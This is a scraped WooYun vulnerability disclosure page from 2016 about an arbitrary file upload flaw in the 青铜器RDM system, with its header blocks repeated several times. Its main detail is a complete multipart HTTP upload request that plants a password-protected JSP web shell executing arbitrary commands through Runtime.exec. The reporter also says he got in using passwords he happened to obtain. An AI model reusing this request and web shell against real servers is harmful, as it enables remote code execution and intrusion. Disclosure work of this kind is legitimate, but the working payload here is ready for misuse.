青铜器RDM任意上传getshell | wooyun-2016-0193295| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0193295

漏洞标题：青铜器RDM任意上传getshell

漏洞作者： wooutl

提交时间：2016-04-07 12:50

修复时间：2016-05-26 11:20

公开时间：2016-05-26 11:20

漏洞类型：文件上传导致任意代码执行

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2016-04-07：细节已通知厂商并且等待厂商处理中
2016-04-11：厂商已经确认，细节仅向厂商公开
2016-04-21：细节向核心白帽子及相关领域专家公开
2016-05-01：细节向普通白帽子公开
2016-05-11：细节向实习白帽子公开
2016-05-26：细节向公众公开

简要描述：

青铜器RDM任意上传getshell

详细说明：

头两天很偶然得到几个密码进到rdm系统转了转
找了个下载看看位置

解了看看

上传了看看

本地提交看看

一句话看看

"http://**.**.**.**/upload?dir=cmVwb3NpdG9yeQ==&name=bXl0ZXN0LmpzcA==&start=0&size=7000&"& HTTP/1.1
Accept: text/*
Content-Type: multipart/form-data; boundary=----------KM7Ij5234ei4GI3Ef1cH2ei4ei4e
User-Agent: Shockwave Flash
Host: **.**.**.**
Content-Length: 893
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: _ga=GA1.2.1259806175.1459557490; _jzqa=1.1299702211058405000.1459557490.1459573115.1459585791.4; Hm_lvt_6d141314e7cea7d4950e6b57c4d67420=1459557490; sgsa_id=**.**.**.**|1459557516975289; _jzqx=1.1459573115.1459573115.1.jzqsr=**.**.**.**|jzqct=/forum%2Ephp.-; username=%u5F2%sdfe; userpassword=; JSESSIONID=708109C330E9D9C86F1D09814A180CFB
------------KM7Ij5ei4GI3Ef1cH2ei4ei4ei4gL6
Content-Disposition: form-data; name="Filename"
1.jsp
------------KM7Ij5ei4GI3Ef1cH2ei4ei4ei4gL6
Content-Disposition: form-data; name="folder"
/pages/common/
------------KM7Ij5ei4GI3Ef1cH2ei4ei4ei4gL6
Content-Disposition: form-data; name="Filedata"; filename="§1.jsp§"
Content-Type: application/octet-stream
<%
    if("el0@ncn_pass".equals(request.getParameter("pwd"))){
        **.**.**.**.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    }
%>
------------KM7Ij5ei4GI3Ef1cH2ei4ei4ei4gL6
Content-Disposition: form-data; name="Upload"
Submit Query
------------KM7Ij5ei4GI3Ef1cH2ei4ei4ei4gL6--

漏洞证明：

修复方案：

客户端加强算法或服务端预处理，需验证客户端信息、referer等

版权声明：转载请注明来源 wooutl@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：11

确认时间：2016-04-11 11:13

厂商回复：

CNVD未直接复现所述情况，暂未建立与网站管理单位的直接处置渠道，待认领。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0193295

漏洞标题：青铜器RDM任意上传getshell

相关厂商：青铜器RDM

漏洞作者： wooutl

提交时间：2016-04-07 12:50

修复时间：2016-05-26 11:20

公开时间：2016-05-26 11:20

漏洞类型：文件上传导致任意代码执行

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 wooutl@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0193295

漏洞标题：青铜器RDM任意上传getshell

相关厂商：青铜器RDM

漏洞作者： wooutl

提交时间：2016-04-07 12:50

修复时间：2016-05-26 11:20

公开时间：2016-05-26 11:20

漏洞类型：文件上传导致任意代码执行

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2016-0193295"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 wooutl@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：